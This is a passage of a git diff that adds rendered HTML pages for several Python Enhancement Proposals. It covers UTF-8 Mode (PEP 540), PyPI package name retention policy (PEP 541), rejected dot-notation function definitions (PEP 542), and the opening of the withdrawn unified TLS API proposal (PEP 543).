Unix command line tools like cat or grep and most Python 2 +applications simply do not have this class of bugs: they don’t decode +data, but process data as a raw bytes sequence.

+

Python 3 already has a solution to behave like Unix tools and Python 2: +the surrogateescape error handler (PEP 383). It allows processing +data as if it were bytes, but uses Unicode in practice; undecodable +bytes are stored as surrogate characters.

+

UTF-8 Mode sets the surrogateescape error handler for stdin +and stdout, since these streams as commonly associated to Unix +command line tools.

+

However, users have a different expectation on files. Files are expected +to be properly encoded, and Python is expected to fail early when +open() is called with the wrong options, like opening a JPEG picture +in text mode. The open() default error handler remains strict +for these reasons.

+
+
+

No change by default for best backward compatibility

+

While UTF-8 is perfect in most cases, sometimes the locale encoding is +actually the best encoding.

+

This PEP changes the behaviour for the POSIX locale since this locale is +usually equivalent to the ASCII encoding, whereas UTF-8 is a much better +choice. It does not change the behaviour for other locales to prevent +any risk or regression.

+

As users are responsible to enable explicitly the new UTF-8 Mode for +these other locales, they are responsible for any potential mojibake +issues caused by UTF-8 Mode.

+
+
+
+

Proposal

+

Add a new UTF-8 Mode to use the UTF-8 encoding, ignore the locale +encoding, and change stdin and stdout error handlers to +surrogateescape.

+

Add the new -X utf8 command line option and PYTHONUTF8 +environment variable. Users can explicitly activate UTF-8 Mode with the +command-line option -X utf8 or by setting the environment variable +PYTHONUTF8=1.

+

This mode is disabled by default and enabled by the POSIX locale. Users +can explicitly disable UTF-8 Mode with the command-line option -X +utf8=0 or by setting the environment variable PYTHONUTF8=0.

+

For standard streams, the PYTHONIOENCODING environment variable has +priority over UTF-8 Mode.

+

On Windows, the PYTHONLEGACYWINDOWSFSENCODING environment variable +(PEP 529) has the priority over UTF-8 Mode.

+

Effects of UTF-8 Mode:

+
    +
  • sys.getfilesystemencoding() returns 'UTF-8'.
  • +
  • locale.getpreferredencoding() returns UTF-8; its +do_setlocale argument, and the locale encoding, are ignored.
  • +
  • sys.stdin and sys.stdout error handler is set to +surrogateescape.
  • +
+

Side effects:

+
    +
  • open() uses the UTF-8 encoding by default. However, it still +uses the strict error handler by default.
  • +
  • os.fsdecode() and os.fsencode() use the UTF-8 encoding.
  • +
  • Command line arguments, environment variables and filenames use the +UTF-8 encoding.
  • +
+
+
+

Relationship with the locale coercion (PEP 538)

+

The POSIX locale enables the locale coercion (PEP 538) and the UTF-8 +mode (PEP 540). When the locale coercion is enabled, enabling the +UTF-8 mode has no additional effect.

+

The UTF-8 Mode has the same effect as locale coercion:

+
    +
  • sys.getfilesystemencoding() returns 'UTF-8',
  • +
  • locale.getpreferredencoding() returns UTF-8, and
  • +
  • the sys.stdin and sys.stdout error handlers are set to +surrogateescape.
  • +
+

These changes only affect Python code. But the locale coercion has +additional effects: the LC_CTYPE environment variable and the +LC_CTYPE locale are set to a UTF-8 locale like C.UTF-8. One side +effect is that non-Python code is also impacted by the locale coercion. +The two PEPs are complementary.

+

On platforms like Centos 7 where locale coercion is not supported, the +POSIX locale only enables UTF-8 Mode. In this case, Python code uses +the UTF-8 encoding and ignores the locale encoding, whereas non-Python +code uses the locale encoding, which is usually ASCII for the POSIX +locale.

+

While the UTF-8 Mode is supported on all platforms and can be enabled +with any locale, the locale coercion is not supported by all platforms +and is restricted to the POSIX locale.

+

The UTF-8 Mode has only an impact on Python child processes when the +PYTHONUTF8 environment variable is set to 1, whereas the locale +coercion sets the LC_CTYPE environment variables which impacts all +child processes.

+

The benefit of the locale coercion approach is that it helps ensure that +encoding handling in binary extension modules and child processes is +consistent with Python’s encoding handling. The upside of the UTF-8 Mode +approach is that it allows an embedding application to change the +interpreter’s behaviour without having to change the process global +locale settings.

+
+
+

Backward Compatibility

+

The only backward incompatible change is that the POSIX locale now +enables the UTF-8 Mode by default: it will now use the UTF-8 encoding, +ignore the locale encoding, and change stdin and stdout error +handlers to surrogateescape.

+
+
+

Annex: Encodings And Error Handlers

+

UTF-8 Mode changes the default encoding and error handler used by +open(), os.fsdecode(), os.fsencode(), sys.stdin, +sys.stdout and sys.stderr.

+
+

Encoding and error handler

+ + + + + + + + + + + + + + + + + + + + + + + + + +
FunctionDefaultUTF-8 Mode or POSIX locale
open()locale/strictUTF-8/strict
os.fsdecode(), os.fsencode()locale/surrogateescapeUTF-8/surrogateescape
sys.stdin, sys.stdoutlocale/strictUTF-8/surrogateescape
sys.stderrlocale/backslashreplaceUTF-8/backslashreplace
+

By comparison, Python 3.6 uses:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
FunctionDefaultPOSIX locale
open()locale/strictlocale/strict
os.fsdecode(), os.fsencode()locale/surrogateescapelocale/surrogateescape
sys.stdin, sys.stdoutlocale/strictlocale/surrogateescape
sys.stderrlocale/backslashreplacelocale/backslashreplace
+
+
+

Encoding and error handler on Windows

+

On Windows, the encodings and error handlers are different:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
FunctionDefaultLegacy Windows FS encodingUTF-8 Mode
open()mbcs/strictmbcs/strictUTF-8/strict
os.fsdecode(), os.fsencode()UTF-8/surrogatepassmbcs/replaceUTF-8/surrogatepass
sys.stdin, sys.stdoutUTF-8/surrogateescapeUTF-8/surrogateescapeUTF-8/surrogateescape
sys.stderrUTF-8/backslashreplaceUTF-8/backslashreplaceUTF-8/backslashreplace
+

By comparison, Python 3.6 uses:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
FunctionDefaultLegacy Windows FS encoding
open()mbcs/strictmbcs/strict
os.fsdecode(), os.fsencode()UTF-8/surrogatepassmbcs/replace
sys.stdin, sys.stdoutUTF-8/surrogateescapeUTF-8/surrogateescape
sys.stderrUTF-8/backslashreplaceUTF-8/backslashreplace
+

The “Legacy Windows FS encoding” is enabled by the +PYTHONLEGACYWINDOWSFSENCODING environment variable.

+

If stdin and/or stdout is redirected to a pipe, sys.stdin and/or +sys.stdout uses mbcs encoding by default rather than UTF-8. +But in UTF-8 Mode, sys.stdin and sys.stdout always use the UTF-8 +encoding.

+
+

Note

+

There is no POSIX locale on Windows. The ANSI code page is used as +the locale encoding, and this code page never uses the ASCII +encoding.

+
+
+
+ +
+

Post History

+ +
+
+

Version History

+
    +
  • Version 4: locale.getpreferredencoding() now returns 'UTF-8' +in the UTF-8 Mode.
  • +
  • Version 3: The UTF-8 Mode does not change the open() default error +handler (strict) anymore, and the Strict UTF-8 Mode has been +removed.
  • +
  • Version 2: Rewrite the PEP from scratch to make it much shorter and +easier to understand.
  • +
  • Version 1: First version posted to python-dev.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0540.rst

+

Last modified: 2024-11-18 13:06:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0541/index.html b/pep-0541/index.html new file mode 100644 index 00000000000..f0a8bcb9381 --- /dev/null +++ b/pep-0541/index.html @@ -0,0 +1,498 @@ + + + + + + + + PEP 541 – Package Index Name Retention | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 541 – Package Index Name Retention

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
BDFL-Delegate:
+
Mark Mangoba <mmangoba at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
12-Jan-2017
+
Post-History:
+

+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an extension to the Terms of Use [1] of the Package +Index [2], clarifying expectations of package owners regarding +ownership of a package name on the Package Index, specifically with +regards to conflict resolution.

+

Existing package repositories such as CPAN [3], NPM [4], and +GitHub [5] will be investigated as prior art in this field.

+
+
+

Rationale

+

Given that package names on the Index are sharing a single flat +namespace, a unique name is a finite resource. The growing age of +the Package Index causes a constant rise of situations of conflict +between the current use of the name and a different suggested use of +the same name.

+

This document aims to provide general guidelines for solving the +most typical cases of such conflicts.

+
+
+

Approval Process

+

As the application of this policy has potential legal ramifications for the +Python Software Foundation, the approval process used is more formal than that +used for most PEPs.

+

Rather than accepting the PEP directly, the assigned BDFL-Delegate will instead +recommend its acceptance to the PSF’s Packaging Working Group. After +consultation with the PSF’s General Counsel, adoption of the policy will then +be subject to a formal vote within the working group.

+

This formal approval process will be used for both initial adoption of the +policy, and for adoption of any future amendments.

+
+
+

Specification

+

The main idea behind this document is that the Package Index serves the +community. Every user is invited to upload content to the Package Index +under the Terms of Use, understanding that it is at the sole risk of +the user.

+

While the Package Index is not a backup service, the maintainers of the +Package Index do their best to keep that content accessible indefinitely +in its published form. However, in certain edge cases the greater +community’s needs might overweigh the individual’s expectation of +ownership of a package name.

+

The use cases covered by this document are:

+
    +
  • Abandoned projects:
      +
    • continued maintenance by a different set of users; or
    • +
    • removal from the Index for use with a different project.
    • +
    +
  • +
  • Active projects:
      +
    • resolving disputes over a name.
    • +
    +
  • +
  • Invalid projects:
      +
    • projects subject to a claim of intellectual property infringement.
    • +
    +
  • +
+

The proposed extension to the Terms of Use, as expressed in the +Implementation section, will be published as a separate document on the +Package Index, linked next to existing Terms of Use in the front page +footer.

+
+
+

Implementation

+
+

Reachability

+

The user of the Package Index is solely responsible for being reachable +by the Package Index maintainers for matters concerning projects that +the user owns. In every case where contacting the user is necessary, +the maintainers will try to do so at least three times, using the +following means of contact:

+
    +
  • the e-mail address on file in the user’s profile on the Package Index;
  • +
  • the e-mail address listed in the Author field for a given project +uploaded to the Index; and
  • +
  • any e-mail addresses found in the given project’s documentation +on the Index or on the listed Home Page.
  • +
+

The maintainers stop trying to reach the user after six weeks.

+
+
+

Abandoned projects

+

A project is considered abandoned when ALL of the following are met:

+
    +
  • owner not reachable (see Reachability above);
  • +
  • no releases within the past twelve months; and
  • +
  • no activity from the owner on the project’s home page (or no +home page listed).
  • +
+

All other projects are considered active.

+
+
+

Continued maintenance of an abandoned project

+

If a candidate appears willing to continue maintenance on an abandoned +project, ownership of the name is transferred when ALL of the following +are met:

+
    +
  • the project has been determined abandoned by the rules described +above;
  • +
  • the candidate is able to demonstrate their own failed attempts to contact +the existing owner;
  • +
  • the candidate is able to demonstrate improvements made on the +candidate’s own fork of the project;
  • +
  • the candidate is able to demonstrate why a fork under a different name +is not an acceptable workaround; and
  • +
  • the maintainers of the Package Index don’t have any additional +reservations.
  • +
+

Under no circumstances will a name be reassigned against the wishes of +a reachable owner.

+
+
+

Removal of an abandoned project

+

Projects are never removed from the Package Index solely on the basis +of abandonment. Artifacts uploaded to the Package Index hold inherent +historical value.

+

An abandoned project can be transferred to a new owner for purposes +of reusing the name when ALL of the following are met:

+
    +
  • the project has been determined abandoned by the rules described +above;
  • +
  • the candidate is able to demonstrate their own failed attempts to contact +the existing owner;
  • +
  • the candidate is able to demonstrate that the project suggested to +reuse the name already exists and meets notability requirements;
  • +
  • the candidate is able to demonstrate why a fork under a different name +is not an acceptable workaround;
  • +
  • download statistics on the Package Index for the existing package +indicate project is not being used; and
  • +
  • the maintainers of the Package Index don’t have any additional +reservations.
  • +
+
+
+

Name conflict resolution for active projects

+

The maintainers of the Package Index are not arbiters in disputes +around active projects. There are many possible scenarios here, +a non-exclusive list describing some real-world examples is presented +below. None of the following qualify for package name ownership +transfer:

+
    +
  1. User A and User B share project X. After some time they part ways +and each of them wants to continue the project under name X.
  2. +
  3. User A owns a project X outside the Package Index. User B creates +a package under the name X on the Index. After some time, User A +wants to publish project X on the Index but realizes name is taken. +This is true even if User A’s project X gains notability and the +User B’s project X is not notable.
  4. +
  5. User A publishes project X to the Package Index. After some time +User B proposes bug fixes to the project but no new release is +published by User A. This is true even if User A agrees to publish +a new version and later doesn’t, even if User B’s changes are merged +to the source code repository for project X.
  6. +
+

Again, the list above is not exclusive. The maintainers of the Package +Index recommend users to get in touch with each other and solve the +issue by respectful communication (see the PSF Code of Conduct [6]).

+
+
+

Invalid projects

+

A project published on the Package Index meeting ANY of the following +is considered invalid and will be removed from the Index:

+
    +
  • project does not conform to Terms of Use;
  • +
  • project is malware (designed to exploit or harm systems or users directly, to +facilitate command-and-control attacks, or perform data exfiltration);
  • +
  • project is spam (designed to advertise or solicit goods or services);
  • +
  • project contains illegal content;
  • +
  • project violates copyright, trademarks, patents, or licenses;
  • +
  • project is name squatting (package has no functionality or is +empty);
  • +
  • project name, description, or content violates the Code of Conduct;
  • +
  • project uses obfuscation to hide or mask functionality; +or
  • +
  • project is abusing the Package Index for purposes it was not +intended.
  • +
+

The Package Index maintainers pre-emptively declare certain package +names as unavailable for security reasons.

+
+
+

Intellectual property policy

+

It is the policy of Python Software Foundation and the Package Index +maintainers to be appropriately responsive to claims of intellectual +property infringement by third parties. It is not the policy of +the Python Software Foundation nor the Package Index maintainers +to pre-screen uploaded packages for any type of intellectual property +infringement.

+

Possibly-infringing packages should be reported to legal@python.org +and counsel to the Python Software Foundation will determine an +appropriate response. A package can be removed or transferred to a +new owner at the sole discretion of the Python Software Foundation to +address a claim of infringement.

+

A project published on the Package Index meeting ANY of the following +may be considered infringing and subject to removal from the Index +or transferral to a new owner:

+
    +
  • project contains unlicensed copyrighted material from a third party, +and is subject to a properly made claim under the DMCA;
  • +
  • project uses a third party’s trademark in a way not covered by +nominal or fair use guidelines;
  • +
  • project clearly implicates a patented system or process, and is +the subject of a complaint; or
  • +
  • project is subject to an active lawsuit.
  • +
+

In the event of a complaint for intellectual property infringement, +a copy of the complaint will be sent to the package owner. In some +cases, action may be taken by the Package Index maintainers before +the owner responds.

+
+
+

The role of the Python Software Foundation

+

The Python Software Foundation [7] is the non-profit legal entity that +provides the Package Index as a community service.

+

The Package Index maintainers can escalate issues covered by this +document for resolution by the Packaging Workgroup if the matter is not clear +enough. Some decisions require additional judgement by the Board, +especially in cases of Code of Conduct violations or legal claims. +Recommendations made by the Board are sent to the Packaging Workgroup [8] for review.

+

The Packaging Workgroup has the final say in any disputes covered by this document and +can decide to reassign or remove a project from the Package Index after +careful consideration even when not all requirements listed +here are met.

+
+
+
+

How to request a name transfer

+

If you want to take over an existing project name on PyPI, +these are the steps to follow:

+
    +
  1. Try to contact the current owner(s) directly: email them and open an issue +if you can find a related repository. The processes described here are meant +as a last resort if the owner cannot be contacted.
  2. +
  3. Check the criteria above to see when a transfer is allowed. In particular, +the criteria for reusing a name for a different project +are more stringent than for continuing maintenance of the same project - although it’s not easy to get a name transferred +in either case.
  4. +
  5. Search the PyPI Support issues +to see if anyone else is already requesting the same name.
  6. +
  7. If all the criteria are met to transfer ownership of the name, +open a new issue +to request it, detailing why you believe each relevant criterion is +satisfied.
  8. +
+
+
+

Prior art

+

NPM contains a separate section linked from the front page called +Package Name Disputes. +It is described as a “living document”, as of January 2017 its +contents might be summarized as follows:

+
    +
  • package name squatting is prohibited;
  • +
  • users wanting to reuse a project name are required to contact the +existing author, with cc to support@npmjs.com;
  • +
  • all contact must conform to the NPM Code of Conduct;
  • +
  • in case of no resolution after a few weeks, npm inc. holds the right +to the final decision in the matter.
  • +
+

CPAN lets any user upload modules with the same name. PAUSE, a related +index, only lists modules uploaded by the primary maintainer or listed +co-maintainers. CPAN documentation doesn’t address disputes otherwise.

+

GitHub’s terms of service contain an exhaustive list of behavior +not meeting general conditions of use. While not codified anywhere, +GitHub does agree for users to reclaim abandoned account names by +archiving the abandoned account and letting the other user or +organization rename their account. This is done on a case-by-case +basis.

+
+
+

Rejected Proposals

+

The original approach was to hope for the best and solve issues as they +arise without written policy. This is not sustainable. The lack of +generally available guidelines in writing on package name conflict +resolution is causing unnecessary tensions. From the perspective of +users, decisions made by the Package Index maintainers without written +guidelines may appear arbitrary. From the perspective of the Package +Index maintainers, solving name conflicts is a stressful task due to +risk of unintentional harm due to lack of defined policy.

+
+
+

References

+ +
+ +
+

Acknowledgements

+

The many participants of the Distutils and Catalog SIGs for their +ideas over the years.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0541.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0542/index.html b/pep-0542/index.html new file mode 100644 index 00000000000..78966ce9107 --- /dev/null +++ b/pep-0542/index.html @@ -0,0 +1,276 @@ + + + + + + + + PEP 542 – Dot Notation Assignment In Function Header | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 542 – Dot Notation Assignment In Function Header

+
+
Author:
+
Markus Meskanen <markusmeskanen at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Function definitions only allow simple function names to be used, +even though functions are assignable first class objects.

+

This PEP proposes adding support for assigning a function to +a class or instance attribute directly in the function +definition’s header by using the dot notation to separate +the object from the function’s name.

+

Although a similar feature, this PEP does not address general +assignment to anything that supports assignment, such as dict keys +and list indexes.

+
+
+

Rationale

+

Currently if a function needs to be assigned to a class or instance +attribute, it requires an additional assignment statement to be made:

+
class MyClass:
+    ...
+
+my_instance = MyClass()
+
+def my_function(self):
+    ...
+
+# Assign to class attribute
+MyClass.my_function = my_function
+
+# Or assign to instance attribute
+my_instance.my_function = my_function
+
+
+

While this isn’t usually an inconvenience, using dot notation to +assign directly in the function’s header would greatly simplify this:

+
class MyClass:
+    ...
+
+my_instance = MyClass()
+
+# Assign to class attribute
+def MyClass.my_function(self):
+    ...
+
+# Or assign to instance attribute
+def my_instance.my_function(self):
+    ...
+
+
+

There are multiple reasons to use this functionality over +a standard class method, for example when the class is referenced +inside the function’s header (such as with decorators and typing). +This is also useful when an instance requires a callback attribute:

+
class Menu:
+    def __init__(self, items=None, select_callback=None):
+        self.items = items if items is not None else []
+        self.select_callback = select_callback
+
+my_menu = Menu([item1, item2])
+
+def my_menu.select_callback(item_index, menu):
+    print(menu.items[item_index])
+
+
+

As opposed to:

+
my_menu = Menu([item1, item2])
+
+def select_callback(item_index, menu):
+    print(menu.items[item_index])
+my_menu.select_callback = select_callback
+
+
+

Or defining them in an “unnatural” order:

+
def select_callback(item_index, menu):
+    print(menu.items[item_index])
+
+my_menu = Menu([item1, item2], select_callback)
+
+
+

It reads better than the “unnatural” way, since you already know at +the time of the function definition what it’s goig to be used for. +It also saves one line of code while removing visual complexity.

+

The feature would also avoid leaving the function’s name into +the global namespace:

+
eggs = 'something'
+
+def Spam.eggs(self):
+    ...
+
+def Cheese.eggs(self):
+    ...
+
+assert eggs == 'something'
+
+
+

Ideally this would be just syntastic sugar:

+
def x.y():
+    ...
+
+# Equals to
+
+def y():
+    ...
+x.y = y
+
+
+

Similar to how decorators are syntastic sugar:

+
@decorate
+def f():
+    ...
+
+# Equals to
+
+def f():
+    ...
+f = decorate(f)
+
+
+
+
+

Implementation

+

The __name__ would follow the principles of a normal function:

+
class MyClass:
+    def my_function1(self):
+        ...
+
+def MyClass.my_function2(self):
+    ...
+
+assert my_function1.__name__ == 'my_function1'
+assert my_function2.__name__ == 'my_function2'
+
+
+

The grammar would use dotted_name to support chaining of attributes:

+
def Person.name.fset(self, value):
+    self._name = value
+
+
+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0542.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0543/index.html b/pep-0543/index.html new file mode 100644 index 00000000000..c35b9c7afa4 --- /dev/null +++ b/pep-0543/index.html @@ -0,0 +1,1620 @@ + + + + + + + + PEP 543 – A Unified TLS API for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 543 – A Unified TLS API for Python

+
+
Author:
+
Cory Benfield <cory at lukasa.co.uk>, +Christian Heimes <christian at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
17-Oct-2016
+
Python-Version:
+
3.7
+
Post-History:
+
11-Jan-2017, 19-Jan-2017, 02-Feb-2017, 09-Feb-2017
+
Superseded-By:
+
748
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP would define a standard TLS interface in the form of a collection of +abstract base classes. This interface would allow Python implementations and +third-party libraries to provide bindings to TLS libraries other than OpenSSL +that can be used by tools that expect the interface provided by the Python +standard library, with the goal of reducing the dependence of the Python +ecosystem on OpenSSL.

+
+
+

Resolution

+

2020-06-25: With contemporary agreement with one author, and past +agreement with another, this PEP is withdrawn due to changes in the +APIs of the underlying operating systems.

+
+
+

Rationale

+

In the 21st century it has become increasingly clear that robust and +user-friendly TLS support is an extremely important part of the ecosystem of +any popular programming language. For most of its lifetime, this role in the +Python ecosystem has primarily been served by the ssl module, which provides +a Python API to the OpenSSL library.

+

Because the ssl module is distributed with the Python standard library, it +has become the overwhelmingly most-popular method for handling TLS in Python. +An extraordinary majority of Python libraries, both in the standard library and +on the Python Package Index, rely on the ssl module for their TLS +connectivity.

+

Unfortunately, the preeminence of the ssl module has had a number of +unforeseen side-effects that have had the effect of tying the entire Python +ecosystem tightly to OpenSSL. This has forced Python users to use OpenSSL even +in situations where it may provide a worse user experience than alternative TLS +implementations, which imposes a cognitive burden and makes it hard to provide +“platform-native” experiences.

+
+

Problems

+

The fact that the ssl module is built into the standard library has meant +that all standard-library Python networking libraries are entirely reliant on +the OpenSSL that the Python implementation has been linked against. This +leads to the following issues:

+
    +
  • It is difficult to take advantage of new, higher-security TLS without +recompiling Python to get a new OpenSSL. While there are third-party bindings +to OpenSSL (e.g. pyOpenSSL), these need to be shimmed into a format that +the standard library understands, forcing projects that want to use them to +maintain substantial compatibility layers.
  • +
  • For Windows distributions of Python, they need to be shipped with a copy of +OpenSSL. This puts the CPython development team in the position of being +OpenSSL redistributors, potentially needing to ship security updates to the +Windows Python distributions when OpenSSL vulnerabilities are released.
  • +
  • For macOS distributions of Python, they need either to be shipped with a copy +of OpenSSL or linked against the system OpenSSL library. Apple has formally +deprecated linking against the system OpenSSL library, and even if they had +not, that library version has been unsupported by upstream for nearly one +year as of the time of writing. The CPython development team has started +shipping newer OpenSSLs with the Python available from python.org, but this +has the same problem as with Windows.
  • +
  • Many systems, including but not limited to Windows and macOS, do not make +their system certificate stores available to OpenSSL. This forces users to +either obtain their trust roots from elsewhere (e.g. certifi) or to +attempt to export their system trust stores in some form.

    Relying on certifi is less than ideal, as most system administrators do +not expect to receive security-critical software updates from PyPI. +Additionally, it is not easy to extend the certifi trust bundle to include +custom roots, or to centrally manage trust using the certifi model.

    +

    Even in situations where the system certificate stores are made available to +OpenSSL in some form, the experience is still sub-standard, as OpenSSL will +perform different validation checks than the platform-native TLS +implementation. This can lead to users experiencing different behaviour on +their browsers or other platform-native tools than they experience in Python, +with little or no recourse to resolve the problem.

    +
  • +
  • Users may wish to integrate with TLS libraries other than OpenSSL for many +other reasons, such as OpenSSL missing features (e.g. TLS 1.3 support), or +because OpenSSL is simply too large and unwieldy for the platform (e.g. for +embedded Python). Those users are left with the requirement to use +third-party networking libraries that can interact with their preferred TLS +library or to shim their preferred library into the OpenSSL-specific ssl +module API.
  • +
+

Additionally, the ssl module as implemented today limits the ability of +CPython itself to add support for alternative TLS backends, or remove OpenSSL +support entirely, should either of these become necessary or useful. The +ssl module exposes too many OpenSSL-specific function calls and features to +easily map to an alternative TLS backend.

+
+
+
+

Proposal

+

This PEP proposes to introduce a few new Abstract Base Classes in Python 3.7 to +provide TLS functionality that is not so strongly tied to OpenSSL. It also +proposes to update standard library modules to use only the interface exposed +by these abstract base classes wherever possible. There are three goals here:

+
    +
  1. To provide a common API surface for both core and third-party developers to +target their TLS implementations to. This allows TLS developers to provide +interfaces that can be used by most Python code, and allows network +developers to have an interface that they can target that will work with a +wide range of TLS implementations.
  2. +
  3. To provide an API that has few or no OpenSSL-specific concepts leak through. +The ssl module today has a number of warts caused by leaking OpenSSL +concepts through to the API: the new ABCs would remove those specific +concepts.
  4. +
  5. To provide a path for the core development team to make OpenSSL one of many +possible TLS backends, rather than requiring that it be present on a system +in order for Python to have TLS support.
  6. +
+

The proposed interface is laid out below.

+
+

Interfaces

+

There are several interfaces that require standardisation. Those interfaces +are:

+
    +
  1. Configuring TLS, currently implemented by the SSLContext class in the +ssl module.
  2. +
  3. Providing an in-memory buffer for doing in-memory encryption or decryption +with no actual I/O (necessary for asynchronous I/O models), currently +implemented by the SSLObject class in the ssl module.
  4. +
  5. Wrapping a socket object, currently implemented by the SSLSocket class +in the ssl module.
  6. +
  7. Applying TLS configuration to the wrapping objects in (2) and (3). Currently +this is also implemented by the SSLContext class in the ssl module.
  8. +
  9. Specifying TLS cipher suites. There is currently no code for doing this in +the standard library: instead, the standard library uses OpenSSL cipher +suite strings.
  10. +
  11. Specifying application-layer protocols that can be negotiated during the +TLS handshake.
  12. +
  13. Specifying TLS versions.
  14. +
  15. Reporting errors to the caller, currently implemented by the SSLError +class in the ssl module.
  16. +
  17. Specifying certificates to load, either as client or server certificates.
  18. +
  19. Specifying which trust database should be used to validate certificates +presented by a remote peer.
  20. +
  21. Finding a way to get hold of these interfaces at run time.
  22. +
+

For the sake of simplicity, this PEP proposes to take a unified approach to +(2) and (3) (that is, buffers and sockets). The Python socket API is a +sizeable one, and implementing a wrapped socket that has the same behaviour as +a regular Python socket is a subtle and tricky thing to do. However, it is +entirely possible to implement a generic wrapped socket in terms of wrapped +buffers: that is, it is possible to write a wrapped socket (3) that will work +for any implementation that provides (2). For this reason, this PEP proposes to +provide an ABC for wrapped buffers (2) but a concrete class for wrapped sockets +(3).

+

This decision has the effect of making it impossible to bind a small number of +TLS libraries to this ABC, because those TLS libraries cannot provide a +wrapped buffer implementation. The most notable of these at this time appears +to be Amazon’s s2n, which currently does not provide an I/O abstraction +layer. However, even this library consider this a missing feature and are +working to add it. For this reason, it is safe to assume that a concrete +implementation of (3) in terms of (2) will be a substantial effort-saving +device and a great tool for correctness. Therefore, this PEP proposes doing +just that.

+

Obviously, (5) doesn’t require an abstract base class: instead, it requires a +richer API for configuring supported cipher suites that can be easily updated +with supported cipher suites for different implementations.

+

(9) is a thorny problem, because in an ideal world the private keys associated +with these certificates would never end up in-memory in the Python process +(that is, the TLS library would collaborate with a Hardware Security Module +(HSM) to provide the private key in such a way that it cannot be extracted from +process memory). Thus, we need to provide an extensible model of providing +certificates that allows concrete implementations the ability to provide this +higher level of security, while also allowing a lower bar for those +implementations that cannot. This lower bar would be the same as the status +quo: that is, the certificate may be loaded from an in-memory buffer or from a +file on disk.

+

(10) also represents an issue because different TLS implementations vary wildly +in how they allow users to select trust stores. Some implementations have +specific trust store formats that only they can use (such as the OpenSSL CA +directory format that is created by c_rehash), and others may not allow you +to specify a trust store that does not include their default trust store.

+

For this reason, we need to provide a model that assumes very little about the +form that trust stores take. The “Trust Store” section below goes into more +detail about how this is achieved.

+

Finally, this API will split the responsibilities currently assumed by the +SSLContext object: specifically, the responsibility for holding and managing +configuration and the responsibility for using that configuration to build +wrapper objects.

+

This is necessarily primarily for supporting functionality like Server Name +Indication (SNI). In OpenSSL (and thus in the ssl module), the server has +the ability to modify the TLS configuration in response to the client telling +the server what hostname it is trying to reach. This is mostly used to change +certificate chain so as to present the correct TLS certificate chain for the +given hostname. The specific mechanism by which this is done is by returning +a new SSLContext object with the appropriate configuration.

+

This is not a model that maps well to other TLS implementations. Instead, we +need to make it possible to provide a return value from the SNI callback that +can be used to indicate what configuration changes should be made. This means +providing an object that can hold TLS configuration. This object needs to be +applied to specific TLSWrappedBuffer, and TLSWrappedSocket objects.

+

For this reason, we split the responsibility of SSLContext into two separate +objects. The TLSConfiguration object is an object that acts as container +for TLS configuration: the ClientContext and ServerContext objects are +objects that are instantiated with a TLSConfiguration object. All three +objects would be immutable.

+
+

Note

+

The following API declarations uniformly use type hints to aid +reading. Some of these type hints cannot actually be used in practice +because they are circularly referential. Consider them more a +guideline than a reflection of the final code in the module.

+
+
+

Configuration

+

The TLSConfiguration concrete class defines an object that can hold and +manage TLS configuration. The goals of this class are as follows:

+
    +
  1. To provide a method of specifying TLS configuration that avoids the risk of +errors in typing (this excludes the use of a simple dictionary).
  2. +
  3. To provide an object that can be safely compared to other configuration +objects to detect changes in TLS configuration, for use with the SNI +callback.
  4. +
+

This class is not an ABC, primarily because it is not expected to have +implementation-specific behaviour. The responsibility for transforming a +TLSConfiguration object into a useful set of configuration for a given TLS +implementation belongs to the Context objects discussed below.

+

This class has one other notable property: it is immutable. This is a desirable +trait for a few reasons. The most important one is that it allows these objects +to be used as dictionary keys, which is potentially extremely valuable for +certain TLS backends and their SNI configuration. On top of this, it frees +implementations from needing to worry about their configuration objects being +changed under their feet, which allows them to avoid needing to carefully +synchronize changes between their concrete data structures and the +configuration object.

+

This object is extendable: that is, future releases of Python may add +configuration fields to this object as they become useful. For +backwards-compatibility purposes, new fields are only appended to this object. +Existing fields will never be removed, renamed, or reordered.

+

The TLSConfiguration object would be defined by the following code:

+
ServerNameCallback = Callable[[TLSBufferObject, Optional[str], TLSConfiguration], Any]
+
+
+_configuration_fields = [
+    'validate_certificates',
+    'certificate_chain',
+    'ciphers',
+    'inner_protocols',
+    'lowest_supported_version',
+    'highest_supported_version',
+    'trust_store',
+    'sni_callback',
+]
+
+
+_DEFAULT_VALUE = object()
+
+
+class TLSConfiguration(namedtuple('TLSConfiguration', _configuration_fields)):
+    """
+    An immutable TLS Configuration object. This object has the following
+    properties:
+
+    :param validate_certificates bool: Whether to validate the TLS
+        certificates. This switch operates at a very broad scope: either
